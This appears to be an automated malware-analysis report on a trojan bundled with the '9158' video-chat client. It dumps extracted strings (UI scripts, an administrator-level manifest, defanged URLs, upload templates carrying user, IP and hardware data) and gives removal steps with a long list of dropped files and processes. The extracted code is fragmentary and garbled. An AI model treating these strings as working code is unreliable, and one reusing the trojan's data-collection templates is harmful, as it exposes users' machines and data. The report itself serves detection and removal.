<script>window.onerror=function(){return true;};function isSecurity(v){var sinfo;if (v.length < 3) { return 0;} var lv = -1; if (v.match(/[a-z]/ig)){lv ;} if (v.match(/[0-9]/ig)){lv ;} if (v.match(/(.[^a-z0-9])/ig)){lv ;} if (v.length < 6 && lv > 0){lv--;}switch (lv) {case 0:sinfo='<font color=red></font>';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');</script><style>body{margin:0px; padding:0px;overflow-x:hidden;overflow-y:hidden;word-break:break-all;background:#d5eaff;}td{padding-right:5px;height:15px;font-size:12px;color:#666666}a{color: #0b66c2; text-decoration:none;};a:hover{color: #0b66c2; text-decoration:underline;};</style><body>SkinRes\X2.bmp
hXXp://roommanage.9158.com/active/usersearch_k/get_bindinfo.aspx?idx=
<table onMouseOver='window.external.OnKillTimer(0)' onMouseOut='window.external.OnSetTimer(0)' width='100%%' height='100%%' border='0' cellpadding='0' cellspacing='0' align=center><tr><td bgcolor=#c8e3ff width=84 align=right>
:</td><td width=15> </td><td width=90>%s</td><td></td></tr><tr><td bgcolor=#c8e3ff align=right>
:</td><td></td><td colspan=2>%s</td></tr><tr><td bgcolor=#c8e3ff align=right>
:</td><td></td><td id=passqd name=passqd style='color:red'></td><td><a href='%s' align=left target=_blank>
:</td><td></td><td>%s</td><td><a href='%s' align=left target=_blank>
:</td><td></td><td style='color:gray'>%s</td><td><a href='%s' align=left target=_blank>
</font>';break;}document.getElementById('passqd').innerHTML =sinfo;}document.oncontextmenu=new Function('event.returnValue=false;');</script><style>body{margin:5px; padding:0px;overflow-x:hidden;overflow-y:hidden;word-break:break-all;background:white;}td{height:19px;font-size:12px;color:#666666}a{color: blue; text-decoration:underline;};</style><body>SkinRes/userlogininfo.png
lastlogin:
%sid=%s&idx=%s
SkinRes\HeadInfo\set.bmp
SkinRes\HeadInfo\bind.bmp
SkinRes\HeadInfo\close.bmp
UserInfoDlg_password2
<body style="overflow:scroll;overflow-x:hidden;overflow-y:hidden;margin:0;background:url('SkinRes\ie_bg.png
SkinRes\Notifybutton.bmp'
%s&userid=%s&type=%s
{47B2178B-6E4A-49B4-9860-9B1836990CA9}{6C9A41B3-ABB2-45F7-B591-93456A6FCD20}{0CFC0B7A-7907-49FD-B181-1B8B3955DB74}<a href='%s' target=_blank style='display:block; position:absolute; width:134px; height:40px; left:38px; top:227px;'> </a>
%s<br>
<div style='position:absolute;right:20px;top:10px'><input type=checkbox onclick='window.external.setPayState(this.checked)'>
//skinres//vipendtime1.png
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background:#000 url(%s);overflow-x:hidden;overflow-y:hidden;background-size:auto;font-size:12px;color:black'> </body>
//skinres//vipendtime2.png
skinres\WarehouseBG.bmp
CWebBrowser2
/**%nick/**
hXXp://room.9158.com/dance_room_new/logpay/silver_help.aspx
SkinRes/BackgroundRB.bmp
SkinRes/BackgroundLB.bmp
SkinRes/BackgroundRT.bmp
SkinRes/BackgroundLT.bmp
KX......GetInputDeviceName...return false
KX......GetInputDeviceName...%s
KX......GetInputDeviceName...2
KX......GetInputDeviceName...1
sound\Blip.wav
KX......GetOutputDeviceName...return false
KX......GetOutputDeviceName...%s
KX......InitSubDlg...m_dlgYsq
KX......InitSubDlg...m_dlgMkf
00000000000000000001
d:\Program Files\9158KTV\9158.RPT
#':<@%'
!%(.FHL
___???***666
(Y%C|B^
*X.Gv<S
*`.Gz
.X7Kw.Dx*<n$4e%8k7Kv4K{@V(W.CuC^
*&)@??%$*
'L":a.Ds 8f.?l0:^
D%3[.Dp
1&-T.Bg
,Y.Cr,@n*?h6N{[oversion="1.0.0.0"
name="9158.exe.manifest"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
!"#$%&'()* ,
{8856F961-340A-11D0-A96B-00C04FD705A2}2014-4-4 10
(192.168.1.44)
6, 9, 4, 0
Login
Windows
9158IE.exe_3116:
.text
`.rdata
@.data
.rsrc
j SSSSSSSh
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
OLEAUT32.dll
MSVCP60.dll
WINMM.dll
?SetJpegQuality@CxImage@@QAEXE@Z
publictool.dll
9158IE.exe
public.dll
NetworkOpt.dll
DEBUG:%s,%d
%d|%d|%d|%d|%d|%d|%d|%d|%d|%d|
MixerXP.dll FAILED
MixerXP.dll
zzzzzzzzzzzzz333 %d %d %d
zzzzzzzzzzzzz111 %d %d %d
zzzzzzzzzzzzz222 %d %d %d
SOFTWARE\9158web
AVUI.dll
qqqqqqqq2:%d %d %d %d
%s|%d
<style> .topNav {display:none; width: 100%; z-index: 100; overflow: visible; position: fixed; bottom: 0px; _position: absolute; _top: expression(documentElement.scrollBottom 0 'px'); background-color:#fff7de; height: 30px; }</style><script>function Fbottomshow(str) { document.getElementById ('bottomshow').style.display = 'block'; document.getElementById ('bottomshow').innerHTML = str; }</script><script>var bScrollState=-1,nType=0; window.onscroll = function(){{ if(bScrollState!=0) { window.external.ScrollBtnSet(nType,1); } bScrollState=0; } else{ if(bScrollState!=1) { window.external.ScrollBtnSet(nType,0); } bScrollState=1; } };</script><script>var bScrollState=-1,nType=1; window.onscroll = function(){<script>var bScrollState=-1,nType=9; window.onscroll = function(){if(document.body){bodyScrollTop = document.body.scrollTop;
if(document.documentElement){documentScrollTop = document.documentElement.scrollTop;
bodyScrollHeight = document.body.scrollHeight;
documentScrollHeight = document.documentElement.scrollHeight;
if(document.compatMode == 'CSS1Compat'){windowHeight = document.documentElement.clientHeight;
windowHeight = document.body.clientHeight;
<style>.fixed{ position:fixed;top:0px;left:0px;z-index:999;height:74px;overflow:hidden} .ie6{ _position:absolute; _margin-top: 0; _top:expression(documentElement.scrollTop)} .c1{text-decoration:none;height:24px;background:#ffc1c1; border:1px solid #f4a8a8;} .c2{cursor:hand;text-decoration:none;float:left;font-size:12px;width:182px; overflow:hidden; white-space:nowrap;color:#392729; height:24px; line-height:24px;vertical-align:middle;padding-left:5px} .c3{cursor:hand;font-size:14px;float:right;width:16px;height:16px;padding:4px 5px 0 0;} </style><div class='fixed ie6' id='fixit' name='fixit'></div> <script type='text/javascript'> function intval(v){ v = parseInt(v); return isNaN(v) ? 0 : v; } function getPos(e){ var l = 0; var t = 0; var w = intval(e.style.width); var h = intval(e.style.height); var wb = e.offsetWidth; var hb = e.offsetHeight; while (e.offsetParent) { l = e.offsetLeft (e.currentStyle ? intval(e.currentStyle.borderLeftWidth) : 0); t = e.offsetTop (e.currentStyle ? intval(e.currentStyle.borderTopWidth) : 0); e = e.offsetParent; } l = e.offsetLeft (e.currentStyle ? intval(e.currentStyle.borderLeftWidth) : 0); t = e.offsetTop (e.currentStyle ? 
intval(e.currentStyle.borderTopWidth) : 0); return { x: l, y: t, w: w, h: h, wb: wb, hb: hb }; } function getScroll(){ var t, l, w, h; if (document.documentElement && document.documentElement.scrollTop) { t = document.documentElement.scrollTop; l = document.documentElement.scrollLeft; w = document.documentElement.scrollWidth; h = document.documentElement.scrollHeight; } else if (document.body) { t = document.body.scrollTop; l = document.body.scrollLeft; w = document.body.scrollWidth; h = document.body.scrollHeight; } return { t: t, l: l, w: w, h: h }; } function scroller(el, duration){ if (typeof el != 'object') { el = document.getElementById(el); } if (!el) return; var z = this; z.el = el; z.p = getPos(el); z.s = getScroll(); z.clear = function(){ window.clearInterval(z.timer); z.timer = null }; z.t = (new Date).getTime(); z.step = function(){ var t = (new Date).getTime(); var p = (t - z.t) / duration; if (t >= duration z.t) { z.clear(); window.setTimeout(function(){ z.scroll(z.p.y, z.p.x) }, 13); } else { st = ((-Math.cos(p * Math.PI) / 2) 0.5) * (z.p.y - z.s.t) z.s.t; sl = ((-Math.cos(p * Math.PI) / 2) 0.5) * (z.p.x - z.s.l) z.s.l; z.scroll(st, sl); } }; z.scroll = function(t, l){ window.scrollTo(l, t) }; z.timer = window.setInterval(function(){ z.step(); }, 13); } </script><script> var str; var AID=new Array; var nownum=0; function closeit(id) { document.getElementById("fixit").removeChild(document.getElementById("a_" id)); if(AID[0] == id) { AID[0]=AID[1]; AID[1]=AID[2]; } else if(AID[1] == id) AID[1]=AID[2]; else if(AID[2] == id) AID[1]=""; nownum--; if(nownum==0) window.external.HaveAnchor(0); } function newit(id,str) { window.external.HaveAnchor(1); if(nownum==3) { closeit(AID[0]); AID[2]=id; } else { AID[nownum]=id; } str="<div id='a_" id "' class='c1'><span class='c2' onclick=scroller('tag_" id "',800);closeit(" id ");>" str "</span><span onclick='closeit(" id ")' class='c3'><img border=0 src='#path#/SkinRes/star/close.png'></span></div><div 
style='clear:both'></div>"; document.getElementById("fixit").innerHTML=str document.getElementById("fixit").innerHTML; nownum ; } </script><script>window.onerror=function(){return true;};var hearinterval;function AddSwf(sContent){document.getElementById('mybg').style.display='block';document.getElementById('mybg').innerHTML=sContent;clearInterval(hearinterval);hearinterval=window.setInterval('heartBeat()',1);}function swfMovieEnd(){clearInterval(hearinterval);document.getElementById('mybg').innerHTML='';document.getElementById('mybg').style.display='none';}function On_change(msg,obj) { obj.innerHTML="<font style='color:#ffffff'>" msg "</font>"} function show_result(sUserID){window.external.OnFlashInfo(sUserID,'admin')} function thisMovie(movieName) { if(navigator.appName.indexOf("Microsoft") != -1 ) return window[movieName]; else return document[movieName]; } function play_movie(idFlash,thing,sDiceNum,isadmin,sUserID,sMsg,sBeging) { var Movie = thisMovie(idFlash); Movie.dowhat(thing,sDiceNum,isadmin,sUserID,sMsg,sBeging);} </script><script>var lastScrollY=0;function heartBeat(){var diffY;diffY=document.body.scrollTop;percent=.3*(diffY-lastScrollY);percent=Math.ceil(percent);document.all.mybg.style.pixelTop =percent;lastScrollY=lastScrollY percent;}</script><style>body p,body span { margin:2px 0; line-height:1.3;}a:link {color: #0b66c2; text-decoration:underline;}</style><body style='overflow-x:hidden;overflow-y:scroll' bgcolor=#e8f3ff style="word-break:break-all"><div id='mybg' name='mybg' style='display:none;position:absolute;left:50%;width:500px;margin-left:-200px;top:0;height:350px;'></div><script> function DoWelcome(id,str){var obj=document.getElementById(id);if(obj.innerHTML.indexOf('')>0) {return;}else{document.getElementById(id).innerHTML="<span style='color:#ccc; underline:none; font-weight:bold; padding-left:10px;'> </span>";window.external.DoForwardNotice(str);}}</script></html>
<script>window.onerror=function(){return true;}; function shake(n) {if (window.top.moveBy) {window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i);
window.top.moveBy(-i,0);
}function On_change(msg,obj) { obj.innerHTML="<font style='color:#ffffff'>" msg "</font>"} function show_result(sUserID){window.external.OnFlashInfo(sUserID,'admin')} function thisMovie(movieName) { if(navigator.appName.indexOf("Microsoft") != -1 ) return window[movieName]; else return document[movieName]; } function play_movie(idFlash,thing,sDiceNum,isadmin,sUserID,sMsg,sBeging) { var Movie = thisMovie(idFlash); Movie.dowhat(thing,sDiceNum,isadmin,sUserID,sMsg,sBeging);} </script><style>body p,body span { margin:2px 0; line-height:1.3;}a:link {color: #0b66c2; text-decoration:underline;}</style><body overflow:scroll;overflow-x:hidden; bgcolor=#e8f3ff style="word-break:break-all">%s9158IE.exe
JoinOpenTreasuryBox
ToOpenUrl2
GotoWebUrl2
UserLogin
ToOpenUrl
GotoWebUrl
OnWebMessageBox
MsgEnterRoom
AppOpenUrl
LoginErrorRoom
PassAdUser
//weibo.ini
filenew.9158.com
room/imgout1.aspx
.PAVCException@@
%u / %u
Content-Type: multipart/form-data; boundary=%s
Content-Disposition: form-data; name="trackdata"; filename="%s"
--%s--
<?xml version="1.0" encoding="GB2312"?><info><uidx>%s</uidx><lossd>%d</lossd><platid>%d</platid><platname>%s</platname><rip>%s</rip><tip>%s</tip><rid>%d</rid></info>
szData=%s
<?xml version="1.0" encoding="GB2312"?><info><uidx>%s</uidx><lossd>%d</lossd><nets>%d</nets><platid>%d</platid><platname>%s</platname><rip>%s</rip><tip>%s</tip><rid>%d</rid></info>
<?xml version="1.0" encoding="GB2312"?><info><uidx>%s</uidx><lossd>%d</lossd><nets>%d</nets><platid>%d</platid><platname>%s</platname><rip>%s</rip><tip>%s</tip><rid>%d</rid><hardw>%s</hardw></info>
%s|%.2f|%d|%.2f
Content-Type: application/x-www-form-urlencoded
.PAVCInternetException@@
VideoHelper.dll
9158VCComm.dll
5.0.0.3
CWebBrowser2
version="1.0.0.0"
name="9158.exe.manifest"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
{8856F961-340A-11D0-A96B-00C04FD705A2}1, 0, 0, 1
9158IE.EXE
Remove it with Ad-Aware
- Click here to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
9158chat2_ktv088_63.exe:2116
sr.exe:244
9158IE.exe:3116
xianfengkunbang.exe:1324
BaiduP2PService.exe:252
BaiduP2PService.exe:472
RsMgrSvc.exe:1936
regsvr32.exe:2380
regsvr32.exe:2448
regsvr32.exe:2328
regsvr32.exe:2480
9158.exe:3012
popwndexe.exe:760
xianfengupdate.exe:660
%original file name%.exe:1736
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓÆµ\öÃâ€ÃƒËœ 9158¶àÈËÊÓÆµ.lnk (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓÆµ\9158¶àÈËÊÓÆµ.lnk (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Desktop\9158¶àÈËÊÓÆµ.lnk (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc11.tmp (1012028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\install.txt (344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr8.tmp (48917 bytes)
%Program Files%\tools\BaiduP2PService.exe (17848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (11 bytes)
%Program Files%\tools\P2PStatReport.dll (12536 bytes)
%Program Files%\tools\P2SBase.dll (18424 bytes)
%Program Files%\tools\P2PBase.dll (17848 bytes)
%Program Files%\tools\sr.exe (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\xui[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\CA4PMRS9.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\CAURKDUJ.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\icons[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\Opendownloadernewxml[1].htm (899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\Downloaderconfig[1].htm (948 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv088_63.exe.tmp (121120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\CA8HUBK5.htm (764 bytes)
C:\temp.icon (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\main[1].ico (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\1[1].swf (48341 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (148 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdtp (158659 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (1040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (2712 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdtp (117549 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdre (2840 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdtp (412553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (892 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\bdsecushr.dat (3628 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdtp (568599 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.dat (2420 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (2124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\ioSpecial.ini (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\modern-wizard.bmp (26 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.exe.log (367 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.dat (708 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll (5257 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\QQPCMgr_Setup.exe (454597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\setup.xml (580 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll (9775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.kui (1661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ui\snin.htm (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsmon.db1 (43 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\RsMgrsvc.ini (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\moncom08.dll (443 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (1222 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (384 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\datastorage.db (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (701 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.dll (1353 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\lics936.txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscommx2.dll (479 bytes)
%Program Files%\Rising\RSD\XMLS\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsMgrSvc.exe (1855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (1707 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\RSCFG.xml (996 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD932\Jpn.lag (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (685 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3w.dll (1848 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\RAVMON.xml (574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\_rav.xml (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\comx3.dll (709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\RAVCONFIG.xml (518 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RstoreDll.dll (953 bytes)
%Program Files%\Rising\RSD\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\selfmon.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\url.ini (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\atl90.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (485 bytes)
%Program Files%\RsTest.ini (14 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.exe (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravconfig.xml (518 bytes)
%Program Files%\Rising\RSD\updater.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (2752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (466 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\dfw.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Setup.exe (8063 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\ravbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.mond (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dll (3859 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogAc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RavSetup.dll (7433 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\RAVXP.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bacore.dll (2321 bytes)
%Program Files%\Rising\RSD\setup.dat (601 bytes)
%Program Files%\Rising\RSD\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\ravlog.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (961 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rscom.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\comx3.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\rsmondef.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\defmon.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\ravxp.exe (601 bytes)
%Program Files%\Rising\RSD\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt09.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dat (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\mergexml.dll (117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (4727 bytes)
%Program Files%\Rising\RSD\rsmginfo.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\rslog.dll (25 bytes)
%Program Files%\Rising\RSD\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rslang.dll (1655 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\ravmon.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\adefmon.mond (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (2190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\url.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.xml (404 bytes)
